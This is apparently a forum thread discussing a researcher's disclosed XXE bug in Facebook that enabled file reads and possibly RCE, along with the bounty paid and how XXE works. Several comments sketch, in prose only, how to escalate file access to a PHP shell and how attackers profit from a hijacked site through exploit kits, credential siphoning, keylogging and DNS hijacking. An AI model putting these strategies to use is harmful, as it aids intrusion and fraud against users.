I'm curious: how much time would you say you worked on researching and identifying this bug? BTW, I don't begrudge you the payout one little bit, no matter how long you spent on it; such an amount is change down the back of the sofa for facebook, and the potential impact of the bug means they got a great deal!
Well, I originally found the OpenID bug in 2012, but hadn't noticed Facebook was vulnerable until very recently. After I found their OpenID endpoint, the hardest part was getting them to make me a Yadis discover request. Then I had to squash a little bug in the exploit. Most of the time was spent re-reading the OpenID spec. I'd say total amount of work (including the time it took me to write the post) was about 2 days.
As I said in the post, I already had a strong suspicion that, once I could read files, escalating to RCE would be easy. But I decided not to do it without permission and they fixed the bug very quickly. As much as I'd loved to actually see the output of an ls or something like that, I think I made the right call.
I quoted that as a joke. I'm too familiar with bug bounties to ever expect one million dollars as reward for a bug. Let's hope people don't take it seriously. Lesson learned: since I'm not a native speaker, I shouldn't joke unless the joke is obvious.
A bug that lets you execute code on Facebook's servers is worth millions if not billions of dollars. You'll be rewarded with much less than that, but considering Facebook's market cap it is extraordinarily valuable.
No, it is not worth "millions or billions". It is worth whatever anyone is willing to pay for it. Since Facebook has very aggressive monitoring and will shutdown hacks quite rapidly, the ROI for a bug like this would have to be realised very quickly. Say in the order of days, (or maybe even hours), rather than months. How would you monetise 1 week of running code on facebook? Injecting malware would get the whole thing shutdown even faster, so you'd have to either go passive or operate in a reduced window of opportunity.
There are no legal entities that would buy the bug, the USG can access any data w/ a warrant (thats free) vs. "millions or billions". Any other law enforcement agency could do the same thing. There is really no value there to them. So it would have to be blackhats, and that means some idiotic Russians mass owning everyone with old Java bugs. Again - not worth much.
This sort of bug has very little value, except to facebook.
The part of the work you don't see is the hours, days and months spent, usually unpaid, spent auditing code to find the bugs.
It is like the anecdote of Tesla and Ford and knowing where to put the X, you aren't paying for time or manual labour - bug value is derived from how much damage it can cause, what its worth to Facebook to not be exploited and what the exploit is worth to the bad guys on the black market.
You pay for results, not for time. And you can use an existing market to define a price.
Time is often used to measure compensation – lawyers are well known for being paid in hourly fees –, however, in the long run, only results counts. And concerning the market, for how much could this bug have been sold, for example to the NSA?
HP's WebInspect, a blackbox testing tool, also can find XXE's. However, as the OP shows, XXE's can be tricky and involve a lot of nuance to cox them out. General dynamic testing tools aren't as good at uncovering XXE's as static analysis tools.
Disclaimer: I used to work on WebInspect's audit engines
Since this sounds like it affects a lot of people in a lot of places, I went about auditing my own code and found that if you're using libxml2 >= 2.9.0, you should be safe, unless you're explicitly requesting entity expansion:
For the nokogiri users, there are a couple of proofs-of-concept in this ticket: https://github.com/sparklemotion/nokogiri/issues/693 - they should be patched with modern versions of nokogiri and libxml2, but if you're running older versions, you might want to verify their behavior before someone else does it for you.
Yes, XML is data, but it allows you to specify where other data is located that should be included when processing it. These links can be to addition data, or to definitions of how to process the data in the document (XML entities). It's a simplification, but it's as if XML can have #includes, where the source of the #include is a URL, and can even be a file:/// URL.
So the attack looks like this: Server takes input from evil user, inserts it into an XML document in memory. The input is malicious, and contains not only XML data, but XML directives to include other documents, specifically /etc/passwd on the location machine. The XML document is processed, the contents of /etc/passwd are automatically read by the XML parser/processor. However the data is not in the correct format, and the XML parser/processor spits out a detailed error message, showing the data that could not be processed/parsed, which is the contents of /etc/passwd.
Sure it makes sense, what doesn't make sense is the library reading anything it is thrown at it.
I'm thinking there should be a "root path" for the library to be able to access files. Sure, you want to include "base.xml" it's in a specific directory and the library is allowed to read only that, and no "../../../../etc/password" tricks.
You don't really need to be a master of a specific language. You just have to understand general programming concepts. The hard part is getting the right approach to searching for vulnerabilities. Learning to recognize everywhere the target system is taking input and estimating what it is doing with that input is where the skill is at.
A lot of people think its not enough money. In this case it appears to be about 30K USD.
Here's an issue with paying more: the security engineers employes are paid around 100 to 150K a year.
Imagine you'd get paid 100K for a big exploit. It wont be valuable to be a security engineer anymore (since you can't be paid additionally for finding the bugs), it's better to be unemployed and spend your time finding the bugs.
I think that's one of the main issue, at least until bugs are extremely, extremely rare (which really, they aren't - these news are really the tip of the iceberg).
>and due to a valid scenario he theorized involving an administrative feature we are scheduled to deprecate soon, we decided to re-classify the issue as a potential RCE bug.
I imagine it might be some feature that could maybe be triggered internally through a file:// or http://localhost/ URL, and in doing so gain access to an interface that can issue shell commands. That's pure speculation though, and I'm probably way off.
once you've fs access, it's rarely extremely hard, unless the systems are very well protected from within (such as with RBAC and what-not).
They never protect the systems from within that well because generally it's more effort than it's worth (well, of course, the day a company becomes bankrupt because of an RCE, they'd wish they spent the time - as usual with security).
Of course, it doesn't mean it's always possible. It's just likely.
Random scenario, since /etc/passwd is available, it tells me the php config sucks. you could just write a php shell and run it on the web interface. Or have the code within requests and read the log file (again, its all about config. if php let you read the file and doesn't only execute for .php files, bang. or if you can write a .php, bang again.)
The point really is that I rarely see people caring about protecting anything or following best practices once someone found a bug that affects the system (such as fs access).
My initial understanding is that the XXE flaw allows the attacker to read local files, or make network requests via the remote host (essentially, proxying them), but still only delivered to his client, rather than actually modifying or creating files on the remote host itself.
remote read access is much more limited than remote write access, but even write access will be limited by file permissions, and doesn't necessarily translate to code execution.
injecting some code into some of the web-app source that gets triggered by an additional request would probably be hte easiest way, but you might also look for system binaries that get called by cron or similar.
Sounds like he didn't use any of these, and it was actually some sort of local web-accessible (but externally firewalled) admin interface that a suitable request could exploit, and I'm very curious how that part of it would work (especially how you'd know/find out about it as an outsider)
From the article, he says just shoot him an email.
If you find this interesting and want to hire me to do a security
focused review or penetration testing in your own (or your
company's) code, don't hesitate to send me an email at
People here seem to have a strongly misplaced expectations about what bug bounties pay. Vulnerabilities in web apps/servers tend to be worth less than vulnerabilities in client computers for a few reasons
First, web app vulns are usually specific to a single site. (Unless obviously you find an issue in a common underlining framework, say, a session fixation attack in how PHP or ASP.NET handles sessions).
Second, and much more importantly, the vast majority of site's don't have financially actionably information. Unless you handle banking/credit card info, I am limited in what I can do to extract value from the server (compared to a compromised client). There aren't that many vectors to extract value.
-Dump their list of usernames/passwords? Ok, maybe some of those will also be used on other banking or commerce sites, but I have challenges/risks actually getting money out. And if I want stolen credit card numbers I can just buy them in card forums.
-Serve sleazy advertising? Ok, possible, but ad's are a crappy business to be in and its definitely a high volume/long time approach (ask how well Huffpo pays its writers). You can try affiliate spamming/stuffing, but again, not huge value. Both ads and affiliate approaches are dependent on how much traffic the server you hacked gets. Low traffic, you make no money. The more traffic, the larger the site, the smarter/better equipped the IT/security team. How long do you really think an Alexa top 10 or top 100 site won't notice an IFRAME pointing to .ru or .cn?
-Mining cryptocurrency? Not financially viable
What usually happens when a server is compromised is that an exploit kit is installed and it's used to attack the visitors (specifically exploit a vulnerability in the client). And so we are back to attacking clients to extract value over attacking (most) websites. Why do this? Simple:
- There are orders of magnitude more desktops/browsers than web servers.
- They are running tons of diverse plugins and software so the attack surface is much larger.
- Most of that software will be out of date and have known vulnerabilities.
- Very few of these clients are "managed" by a personal IT person like a web server. The user is far less likely to notice anything bad.
All of that mean I can reach more targets, compromise a larger number of them, and hold them for longer. Why is this better than pwning a server? Because lots of scenarios to extract value that don't work on a handful of web servers do work when I have thousands and thousands of compromised clients:
-Show them ads
-Stuff affiliate links
-Changing their DNS settings and MitM all their traffic (bank.com? Why that's right over here!)
-Keylog them to actually steal financial data, credits cards, bank logins, etc
-Use them to send spam
-Use them as a botnet to DDoS people and get paid protection money
To put this in prospective, very smart hackers doing crazy stuff to break out of Chrome's sandbox and exploit clients are getting $50-$100k in public contests like Pwn2Own. Getting $35,000 for a RCE is pretty awesome
Getting drive-by traffic is one of the most expensive pieces of the puzzle for malware groups. Last time I checked the forums, a thousand visitors was selling for around a dollar, and that isn't even well qualified traffic.
Having access to Facebook and over a billion pageviews per hour would be worth millions to any group who is capable of handling that type of volume. If they were smart about it, they could probably get away with it for up to a day (the Yahoo malware was active for a day and they didn't obfuscate it much).
Back of the envelope value is around $1M per hour, and that doesn't include the premium for the higher quality of traffic, but does assume you find a way to inject across all the servers and somehow not display it to Facebook internal IPs.
A big group with some fresh browser 0day would have loved to get their hands on this.
Considering Facebook's good security team (and Yahoo's notoriously poor one), I suspect that they'd probably catch the malware and perform some sort of emergency action in under an hour.
A much more devious attack would be modifying some of the code to silently siphon off login credentials, and grabbing the user database. Then once they were satisfied with that they could go with the malware route.
Exactly. Pivoting from the server immediately to the clients by serving malware against the visiting browsers/plugins. Even if large site detects what you are doing quickly and shuts you down, you've leveraged that into controlling thousands of desktop machines
Is there some basis to your "fact" of bugs being bought for millions for a social networking site? I could understand if someone found a remote execution bug on Big Bank Corp's website allowing you to transfer anyone's funds to your personal BTC wallet.
Not at all. Your link is for someone finding an entirely new way to bypass protections/sandboxing in IE. That is an enormously impactful issue because it affects hundreds of millions of desktop PCs. Comparing that to a RCE affect a few web servers, even at a site as large as FB, is misplaced.